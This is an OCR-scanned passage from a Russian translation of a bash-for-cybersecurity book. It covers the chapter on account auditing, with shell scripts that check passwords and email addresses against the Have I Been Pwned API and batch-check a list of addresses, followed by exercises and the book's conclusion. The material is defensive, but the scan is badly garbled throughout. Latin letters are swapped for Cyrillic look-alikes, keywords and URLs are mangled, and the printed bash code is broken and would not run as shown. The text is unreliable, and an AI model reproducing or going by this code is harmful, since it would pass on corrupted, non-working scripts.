любые дополнительные символы, которые ѕһа1ѕит могла включить в свой вывод. 


Ө Первые пять символов хеша хранятся в переменной +1г$Е1уе, а символы с 6-го 
по 40-й — в епаіпе. 
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Ө Запрос сайта Науе І Вееп Рупе? производится с использованием О ВТ.-адреса 
КЕЅТ АР! и первых пяти символов хеша пароля. Возвращаемый результат содер- 
жит как символы возврата каретки (\г), так и символы новой строки (\п). Чтобы 
избежать путаницы в среде Глпих, мы удаляем символ возврата. Поиск результата 
ведется с помощью команды эгер и символов хеша пароля, начиная с 6-го и закан- 
чивая 40-м символом. Параметр -1 используется, чтобы вгер была нечувствительна 
к регистру. 


© Чтобы узнать, сколько раз данный пароль был взломан, мы удаляем ведущий 
хеш, то есть все символы до двоеточия, включая сам символ двоеточия. Это 
удаление префикса оболочки, где двойной хештег означает «самое длинное 
возможное совпадение», а звездочка — шаблон, который соответствует любым 
символам. 


Обратите внимание, что сценарий сһескраѕѕ. 5! завершит свою работу с кодом со- 
стояния ё, если пароль найден, и с кодом 1, если пароль не найден. Это похоже на 
поведение не только вгер, но и некоторых других команд оболочки, которые заняты 
поиском определенных данных. Если поиск не увенчался успехом, результатом 
будет вывод с ошибкой (ненулевой) (хотя в случае рипед можно считать, что это 
невыявленный успех). 


Чтобы использовать сценарий, просто введите пароль в командную строку или 
при появлении запроса: 


$ ./сһескраѕѕ.5һ раѕѕмога 


Раѕѕмога 15 Рмпеа 3533661 Тітеѕ! 


Будьте осторожны при передаче паролей в качестве аргументов командной строки, 
так как они видны в полном списке состояния процесса (см. команду рѕ) и могут быть 
сохранены в файле истории Баѕћ. Предпочтительным методом будет чтение пароля 
из ат (например, при запросе). Если сценарий является частью более сложного 
командного конвейера, сделайте пароль первой строкой для чтения из эт. 


Проверяем, не взломан ли адрес 
электронной почты 


Проверка взломанного адреса электронной почты менее сложна, чем проверка 
пароля. Для начала вам понадобится ОВІ. АРТ: 


НЕЕрз : //һамеіреепрмпеа. сот/ар1/\2/БгеасНедассоип*/ 
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Проверяемый адрес электронной почты добавляется в конец О ВТГ-адреса. АРТ 
вернет список нарушений, с которыми был связан данный адрес электронной по- 
чты. Список будет получен в формате ]ЗОМ. В этот список будет включен большой 
объем информации: название нарушения, связанный домен и описание. Если элек- 
тронный адрес в базе данных не найден, будет возвращен код состояния НТТР 404. 


В примере 22.2 показано, как автоматизировать этот процесс. 


Пример 22.2. сһескетаі!.5ћ 
#1! /61п/Базй - 


# 

# Ваѕһ и кибербезопасность 

# сһескетаі1.5һ 

# 

# Описание: 

# Проверка адреса электронной почты на соответствие 
# базе данных сайта Науе І Вееп Рипеа? 

# 

# Использование: ./сһескетаі1.5һ [‹ета11>] 

# <ета11> Е-та11 для проверки; по умолчанию: читать из ѕїаіп 
# 


ІР (( "$#" == 0 )) © 


+һеп 
ргіпҒ 'Епфег ета11 а@аге$$: ' 
геаа ета111п 

е15е 
ета111п="$1" 

1 


рипед=$ (сиг1 -5 "Һёрѕ : //һамеірееприпеа. сот/арі/у2/бгеасһедассоипё/Фетаі1іп") [2] 


1+ [ "$ритей" == "" ] 
+һеп 
ехії 1 
е1ѕе 
есһо 'Ассоип& рмпеа іп {Пе Ғо11оміпе бгеасһеѕ: ' 
есһо "Фрипеа" | егер -Ро '"Мате":".*2"' | си -а':' -#2 | 4г -а '\"' Ө 
ехії 0 


1 


© Здесь выполняется проверка, был ли адрес электронной почты передан в каче- 
стве аргумента; если нет, пользователю будет направлен запрос. 


Ө Запрос на веб-сайт Науе І Вееп Р\упе4?. 


Ө Если ответ был возвращен, выполните простой синтаксический анализ ]ЗОМ 
и извлеките пару «имя/значение». Дополнительную информацию об обработке 
ЈЅОМ см. в главе 11. 
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Для использования сценария сһескетаі1. ѕһ передайте в качестве аргумента адрес 
электронной почты или введите его при появлении запроса: 


$ ./сһескетаі1.5һ ехатр1е@ехатр1е. сот 


АссоипЁ рмпеа іп {Ве Ғо11оміпе бгеасһеѕ: 
@ёдмебһоѕ 

Ариѕемі+ћуѕ 

Ааобе 

Аро110 


Рассмотрим два других варианта этого сценария. Первый показан в примере 22.3. 


Пример 22.3. спескетайА!. 51 
#1 /бріп/баѕћ 


# 

# сһескетаі1.5һ - проверяем, имеется ли адрес электронной почты 
# в базе данных сайта Науе І Вееп Рмпеа? 

# 


18 (( "$#" == Ө )) о 

ёһеп 
ргіпҒ 'Епфег ета11 а@4ге$$: 
геаа ета111п 

е1ѕе 
ета111п="$1" 

1 


ИВЕ=" ВЕ рз : //Пауе1Бееприпеа . сот/ар1 /\2 /6геаспедассоип* /$ета111п" 


рипед=$ (сиг1 -5 "ФИВЬ" | егер -Ро '"Мате":".*?"') [2] 
1 [ "Фрипеа" == "" ] 
һеп 
ехії 1 
е15е 
есһо 'Ассоип& рмпеа іп {Пе Ғо11оміпе бгеасһеѕ: ' © 
рипед="${рипеа//\"/}" # удалить все кавычки 
рипед="${рипед/ /Мате:/} " # удалить все 'Мате: ' 
есһо "${рипеа}" 
ехії 0 
Ғі 


© Как и в предыдущем сценарии, чтобы определить, предоставил ли пользователь 
нужное количество аргументов, используйте счетчик аргументов. Если аргументов 
недостаточно, направьте пользователю запрос. 
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Ө В этой версии сценария вместо того, чтобы вернуть все выходные данные из 
команды сиг1 и только после этого выполнить команду вгер, команда 5гер вы- 
полняется сразу. Такая организация вызовов более эффективна, так как вызов 
подоболочки (через конструкцию $ ()) происходит один раз, а не дважды (сначала 
ДЛЯ сиг1, а затем для вгер), как это делалось в исходном сценарии. 


Ө Вместо того чтобы для редактирования результатов применять сиё и +, мы 
используем подстановки переменных Баз|. Это более эффективно, поскольку по- 
зволяет избежать затрат системных ресурсов, связанных с системными вызовами 
Ғогк и ехес, которые вызывают две дополнительные программы (си и ёк). 


При разовом выполнении данного сценария вы скорее всего не заметите повы- 
шения эффективности. Но эта разница будет заметна при написании сценария, 
который в одном сеансе выполняет множество таких вызовов. 


В примере 22.4 показан еще один вариант сценария, уже в кратком виде. 


Пример 22.4. сһескетаі!.1іпег 
#1! /61п/Ба$й 


# 
# сһескетаі1.5һ - проверяем, имеется ли адрес электронной почты 
# в базе данных сайта Науе І Вееп Рмпеа? 
# в одной строке 
ЕМАІГІ№="$1" 
14 (( "$#" == 0 )) © 
{Пеп 
рг1пЕ+ 'Епфег ета11 а@аге$$: ' 
геаа ЕМАТЕТМ 
11 


ЕМАТЕТМ=" ПЕ рз : / /һауеірееприпеа. сот/арі/%2/бгеасһедассоипі/ ФЕМАІІІМ" 


есһо 'АссоупЕ рмпеа іп Не Ғо11оміпе бғгеасһеѕ: ' 
сиг1 -$ "ФЕМАТЬТМ" | вгер -Ро '"Мате":".*2"' | сиё -а':' -42 | +г -а '\"' Ө 


Ф Это та же проверка, что и раньше, но, чтобы захватить полный О ВТ, мы будем 
использовать только одну переменную оболочки, ЕМАТЕТМ, и не станем вводить 
вторую переменную ОКІ. 


Ө В данном сценарии используется более длинный конвейер, и мы можем выпол- 
нить все манипуляции в одной строке. Использование переменных оболочки для 
анализа наших результатов может быть более эффективным, но требует нескольких 
строк кода. Некоторые программисты предпочитают краткие команды. Но обратите 
внимание на одно отличие в поведении этого сценария: заголовок по-прежнему 
выводится, даже если нет других выходных данных (то есть адрес не был взломан). 
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Чтобы показать разнообразие решений, которые вы можете найти и использовать 
при написании сценариев оболочки, мы привели три варианта сценария. Суще- 
ствует множество компромиссных решений как по стилю, так и по сути, которые 
можно использовать при выполнении вашей задачи. 


Пакетная обработка электронных адресов 


Если нужно проверить несколько адресов электронной почты на их наличие в базе 
данных сайта Науе І Вееп Рупей?, можете автоматизировать процесс. В примере 22.5 
показано, как считать файл со списком подлежащих проверке адресов электронной 
почты и выполнить для каждого электронного адреса сценарий сһескетаі1. ѕћ. Если 
адрес электронной почты был взломан, он будет показан на экране. 


Пример 22.5. етаібаёсһ.ѕһ 
#1!/61п/Ба$й - 


# 

# Ваѕһ и кибербезопасность 

# емаі1раїсһ.ѕһ 

# 

# Описание: 

# Чтение файла с адресами электронной почты 

# и проверка их на сайте Науе І Вееп Рмпеа? 

# 

# Использование: ./ета11Баеси.$И [<+і1епате> ] 

# <+11епате> Файл с одним адресом электронной почты в каждой строке 
# по умолчанию: читать из ѕїъаіп 

# 

са "$1" | г -а '\г' | мһі1е геаа #і1еііпе о 
ао 


./сһескетаїі1.ѕһ "$+11е11пе" > /4ем/пи11 ө 


іғ (( "$?" ==0)) Ө 


ёһеп 

есһо "$Ғі1еііпе 15 Рипеа!" 
+1 
ѕ1еер 0.25 ө 


аопе 


© Прочитайте файл, переданный через первый аргумент. Команда +а использу- 
ется для удаления разрывов строк Ұіпіо%ѕ, поэтому они не включаются в адрес 
электронной почты. 


Ө Запускается сценарий сһескетаі1.ѕһ и в качестве аргумента передаются адреса 
электронной почты. Вывод перенаправляется в /де\у/пи11, поэтому не отображается 
на экране. 


Глава 22. Инструмент: аудит учетных записей 285 


© Для проверки состояния завершения последней выполненной команды исполь- 
зуется $?. Сценарий спесКета11 .5Н вернет ё, если электронный адрес найден, и 1, 
если не найден. 


Ө Задержка на 2500 миллисекунд нужна, чтобы убедиться, что сценарий не пре- 
вышает ограничение скорости сайта Науе І Веер Р\упе4?. 


Чтобы запустить сценарий етаі1баєсћ. 5, передайте текстовый файл, содержащий 
список адресов электронной почты: 


$ ./ета1]баеси.$И етаі1аййгеѕѕеѕ.іхі 


ехатр1е@ехатр1е.сот 15 Рипеа! 
ехатр1е@5та11.сом 15 Рипеа! 


Выводы 


Чтобы определить, были ли при крупной утечке данных взломаны адреса элек- 
тронной почты и пароли, эти сведения следует регулярно проверять. Просите 
пользователей изменять взломанные пароли, так как эти пароли с высокой веро- 
ятностью могут быть частью словарей паролей злоумышленников. 


Упражнения 


1. Переработайте сценарий сһескраѕѕ.ѕһ так, чтобы в качестве аргумента команд- 
ной строки он мог также принимать хеш ЗНА-1 пароля. 


2. Создайте сценарий, похожий на етаі1ба+сћ. $1, который может читать из файла 
список хешей паролей ЅНА-1, и используйте сһескраѕѕ.5ћ для проверки того, 
не скомпрометированы ли они. 


3. Скомбинируйте сценарии сНесКраз$ . $, сһескетаі1.ѕһ и етаї1ра+сһ.ѕһ в один 


скрипт. 


Чтобы просмотреть дополнительные ресурсы и получить ответы на эти вопросы, 
зайдите на сайт ВЁрз://\ммим/.гарсуБегор$.сот/. 


Заключение 


Как было показано в этой книге, командная строка и связанные с ней возможности 
и инструменты создания сценариев являются бесценным ресурсом для специалиста 
по кибербезопасности. Это можно сравнить с мультиинструментом с бесконечно 
изменяемой конфигурацией. Соединяя продуманную последовательность команд 
в конвейер, можно создать однострочный сценарий, выполняющий чрезвычайно 
сложные функции. Для увеличения функциональности можно создавать много- 
строчные сценарии. 


В следующий раз, столкнувшись с проблемой, прежде чем доберетесь до готового 
инструмента, попробуйте решить ее с помощью командной строки и Баѕћ. Со вре- 
менем вы будете улучшать свои навыки и однажды сможете поразить окружающих 
своим опытом работы с командной строкой. 


Мы рекомендуем вам связаться с нами на веб-сайте СуБегзесиг бу Орѕ (Һрѕ:// 
үгуууү.гаріасубегорѕ.сот/), задать свои вопросы и предоставить примеры созданных 
вами сценариев, которые сделали вашу работу более продуктивной. 


Удачных сценариев! 


есһо 'Раи1 апа Саг1' | ѕһа1ѕит | сиё -с2,4,11,16 
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